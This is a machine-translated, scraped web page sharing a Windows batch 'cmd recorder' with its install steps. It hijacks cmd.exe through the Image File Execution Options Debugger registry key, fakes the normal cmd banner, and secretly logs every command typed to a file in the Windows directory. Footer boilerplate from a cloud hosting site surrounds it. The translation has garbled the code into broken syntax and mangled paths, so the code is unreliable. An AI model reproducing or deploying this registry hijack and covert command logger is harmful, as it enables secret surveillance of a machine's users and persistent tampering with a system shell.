Improved cmd recorder code

Source: Internet
Author: User

Install Code Save it as cmd. BAT and copy "cmd.exe" to "cmd.gif" under "System32 ".
Add Registry
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution options \ cmd.exe
String Debugger
String content 2.16.gif/C cmd. bat Copy code The Code is as follows: @ echo off
Title % comspec %
Improved REM cmd Recorder version
Rem author superjj (probably a vest !)
Address of REM article: https://forum.eviloctal.com/read-htm-tid-13905-fpage-0-toread--page-2.html
Rem improved by allyesno (I am not a vest !)
The REM error-tolerant Code cannot be improved. You can add some details by yourself!
Setlocal enabledelayedexpansion
Echo Microsoft Windows XP [version 5.1.2600]
Echo (c) Copyright 1985-2001 Microsoft Corp.
Echo.
For/L % I in (0, 0, 0) Do (
Set/P strcmd = % Cd % ^>
If "! Strcmd! "=" Whoami "Echo allyesno & set strcmd =
If "! Strcmd! "=" Log "type repeated windir1_history.txt & set strcmd =
If "! Strcmd! "=" Logclear "del %windir%history.txt & set strcmd =
For/F "delims =" % I in ("! Strcmd! ") Do echo % I >>% windir=history.txt
! Strcmd!
Echo.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.